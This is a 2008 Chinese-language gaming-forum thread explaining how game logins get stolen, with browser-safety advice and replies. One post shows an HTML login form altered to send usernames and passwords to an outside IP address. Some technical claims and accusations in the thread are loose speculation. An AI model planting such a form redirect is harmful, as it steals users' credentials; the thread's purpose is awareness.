原本在下不怎麼想po這篇, 因為在下覺得這算是瀏覽網路世界的安全基本常識, 但有些人似乎這方面知識不足, 導致遊戲帳號被盜, 所以乾脆就整理一篇po出來分享, 能看懂得話只能算是對底層知識有一些基本的認識
---------------------------------------------------------------------------------------------
遊戲帳密被盜的幾種途徑：
在說明以下盜取途徑之前, 讀者必須先有以下動態網頁的運行常識
一般網路上所謂動態網頁的動態效果 絕大多數都是由用戶端
電腦來執行伺服器端送出的網路程式碼所產生的效果, 而那些程式碼也有可能
是惡意的, 有了以上觀念, 就能歸類出以下幾點盜取用戶端帳密的途徑
1.
連上遊戲網頁且該網頁已被惡意嵌入需在用戶端執行的程式碼
(如: Java、JavaScript、VBScript、JScript), 接著當使用者對網站伺服器發出
對該網頁的讀取要求, 伺服器就會連帶送出html標籤和那些需在用戶端執行的程式
碼給使用者的系統執行, 而那些惡意程式碼在瀏覽器收到之後就會直譯執行,
且在關閉網頁後惡意程式碼依然在電腦中執行,所以當使用者連上遊戲並輸入
帳密之後, 帳密資料就透過那些惡意程式碼經由網路送到駭客電腦中。

2.
網頁原始碼直接遭到竄改, 通常被竄改的地方都是要使用者輸入帳號密碼的網頁
考慮以下html表單標籤
例如:
網頁原本的原始碼是
<form action="process.php" method="POST">
帳號:<input type="text" name="id" size=30><br>
密碼:<input type="password" name="pass" size=30><br>
<input type="submit" value="送出資料">
</form>
效果：當使用者在表單中輸入帳號和密碼之後並按"送出資料"的按鈕送出
表單中輸入的資料, 資料就會送到網站伺服器中的"process.php"來執行

接著只要將他竄改成
<form action="http://140.235.123.123/process.php" method="POST">
帳號:<input type="text" name="id" size=30><br>
密碼:<input type="password" name="pass" size=30><br>
<input type="submit" value="送出資料">
</form>
效果：使用者輸入的資料就會改送到駭客的電腦中而非送到原本網站伺服器的網頁

3.
根據第2點, 這次不竄改原始碼反而是在原始碼中加一些額外的程式碼(往往透過
用戶端的瀏覽器來觀看網頁原始碼也查看不到, 程式碼有可能是在伺服器端執行,
也可能是在用戶端執行), 以達成當使用者在網頁中按"送出資料"的按鈕時送出
兩份使用者輸入的資料到不同的目的地,一個是正確的目的地, 另一個則是到駭
客的電腦中。

4.
下載.exe.....等不明檔案到電腦中執行, 造成自己系統將
送出的網路封包透過網路洩漏給駭客知道。

總結安全法則：
1.不下載不明檔案在電腦中執行(最根本)
2.改用火狐瀏覽器並安裝"No Script"的extension套件, 不讓瀏覽器下載或執行那些須在用戶端電腦執行的程式碼。
3.瞭解最基本的html表單標籤、CSS的語法或者其他網路語言, 以辨識問題在哪。

建議的第二條有幫火狐打廣告的嫌疑-3-...(誤
---------------------------------------------------------
說真的，即使只是使用IE，使用者自己平常不要亂按也不會去執行到什麼

雖說大部分的人都因為不懂所以什麼都按同意或允許啦...

唔，第二項加個"建議"改用火狐比較好…?
不然就如1樓所說，有些廣告嫌疑。

不過各人認為…這樣應該不至於吧?
不過改一改會比較客觀… (?)

用火狐瀏覽器會比較好嗎QQ?
應該是火狐有某種特殊功能才要用火狐吧-.-
本人不是用火狐瀏覽器用其他瀏覽器還是沒中過毒
帳號從來沒被盜過
個人絕得IE有漏洞-.-不要用IE比較好其他瀏覽器也比IE好用很多
目前的瀏覽器好像都有擋廣告等一些特殊功能也比IE好用吧-3-

我覺得能看懂的人應該很少XDD

忘記在哪看過的一句話....

只要你電腦有連上網路，就有被入侵的可能。

不管你防毒是司機、趨勢、諾頓都一樣，

防火牆再強也是沒什麼用...道高一尺魔高一丈。

雖然這樣說很消極也很無奈。

不過單就網路遊戲來說，能力比較高的駭客，

應該不會把重心放在這裡，所以應該還是可以安心。

個人還是得注重自己的電腦安全才行，除非你想三不五時就拿去送修重灌XP，這樣安全性就高點XD

簡單來說就是，不該去的不要去，不該點的不要點，不該下載的不要用。

不去奇怪的網站。

不點來路不明的連結or網頁要求下載的東東。

不下載內容不明的東西，特別是.exe檔一看就知道。

對不起...

我...

看不懂囧

好深奧阿...

我有障礙XDDD

QUOTE:

---

作者:B 卐小嫩嫩卐 回覆日期：2008-07-22 13:05:21
用火狐瀏覽器會比較好嗎QQ?
應該是火狐有某種特殊功能才要用火狐吧-.-
本人不是用火狐瀏覽器用其他瀏覽器還是沒中過毒
帳號從來沒被盜過
個人絕得IE有漏洞-.-不要用IE比較好其他瀏覽器也比IE好用很多
目前的瀏覽器好像都有擋廣告等一些特殊功能也比IE好用吧-3-

---

有研究過ie瀏覽器的人都知道, ie有很多安全漏洞; 而會使用火狐瀏覽器則是針對它有很多強大的擴充套件能使用, 而那些套件都是由網路上的網友共同開發而成的, 並且為免費資源只要去社群搜尋後安裝就能使用, 當然在那些套件中有些是針對大多瀏覽器常出現的安全漏洞加以作防護(ex: No Script), 有些則是方便使用者將軟體搭配瀏覽器一起使用(ex:FlashGet)..當然還有其他.....etc

IE安全性漏洞多歸多，但不見得使用了火狐也就能完全避免中毒呀OTL

而且經實驗證明(啥)，IE中毒的案例大多是因為使用者自己搜尋奇怪的東西(?)

並且傻傻的按下它或另存新檔才導致對方連線條件成立~_~|||

本人滿好奇一件事情......
是不是有某一些人是安裝幻想戰記才被盜的(我知道有一些人裝沒事)
因為我同學公會的安裝的都被盜了....
我同學去安裝也被盜了我公會有人安裝也被盜了(光金錢損失2千萬囧)
雖然不知道是不是真的我倒是滿想求證的.....如果是真的也許可以叫橘子負責-0-

QUOTE:

---

作者:B 幻化戰魂 回覆日期：2008-07-23 18:47:26
IE安全性漏洞多歸多，但不見得使用了火狐也就能完全避免中毒呀OTL

而且經實驗證明(啥)，IE中毒的案例大多是因為使用者自己搜尋奇怪的東西(?)

並且傻傻的按下它或另存新檔才導致對方連線條件成立~_~|||

---

沒錯, 用火狐無法完全避免中毒, 不過在下這裡要說的是有些惡意程式(碼)是不需要使用者自行手動下載的, 而是瀏覽器本身就會自行下載接著直譯後執行, 也就是如我本文所說的用戶端執行程式碼(ex: Java, JavaScript...等那些), 那些程式碼就算有裝防毒軟體也很難偵測是不是惡意的, 接著透過那些程式碼對用戶電腦執行某些程式, 駭客就能透過網路取得用戶端電腦的資訊, 然後透過各種途逕取得使用者送到網路上的封包(EX:也就是你登入遊戲需要輸入的帳密資料封包也能抓) .........基本上是這樣

PS:黑橘瑪奇官網就有可能是這種例子

而火狐正好有個套件叫做"No Script"能阻止瀏覽器運行那些用戶端程式碼, 所以特別提出來講

QUOTE:

---

作者:B 卐小嫩嫩卐 回覆日期：2008-07-24 09:46:58
本人滿好奇一件事情......
是不是有某一些人是安裝幻想戰記才被盜的(我知道有一些人裝沒事)
因為我同學公會的安裝的都被盜了....
我同學去安裝也被盜了我公會有人安裝也被盜了(光金錢損失2千萬囧)
雖然不知道是不是真的我倒是滿想求證的.....如果是真的也許可以叫橘子負責-0-

---

竄改.exe程式反而麻煩, 當然也是有種可能; 不過在下是認為黑橘網站本身就有中木馬, 所以你只要去瀏覽它, 你的瀏覽器就會自動下載那些惡意程式碼, 接著再如法炮製用我上一篇講的方法盜取密碼就行了

所以最極端的做法就是...沒事就別連黑橘網站, 你再看看會不會中, 如果會中那就別玩了, 因為那代表黑橘資料庫已被入侵了

一般來說使用FF的使用者對電腦的知識都有一定的程度了才會換 ..

基本上是這樣 ..

一般普通平常的使用者 都直接用IE沒有換別的瀏覽器的

沒說是比較笨或是低階就是了

不過本人我FF跟IE都有用

FF是平常時上網

IE是開特殊網頁 ( 某些需要IE才能開啟的網頁 像是某些學校的網站－皿－ 不支援FF還有IE7 - - )